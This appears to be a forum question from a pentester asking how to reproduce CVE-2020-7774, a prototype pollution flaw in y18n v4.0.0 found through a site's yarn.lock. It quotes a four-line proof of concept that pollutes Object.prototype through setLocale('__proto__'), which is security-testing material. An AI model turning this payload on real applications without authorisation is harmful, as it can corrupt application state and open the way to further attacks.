# How to reproduce this CVE-2020-7774 parameter pollution vulnerability

Tags: vulnerability, websites, prototype-pollution

While pentesting a website I came across `yarn.lock` file that contains an application dependency and I found this vulnerable library y18n v4.0.0 to CVE-2020-7774.

How can I reproduce the vulnerability or how to use the PoC below?

```
const y18n = require('y18n')();
 
y18n.setLocale('__proto__');
y18n.updateLocale({polluted: true});

console.log(polluted); // true
```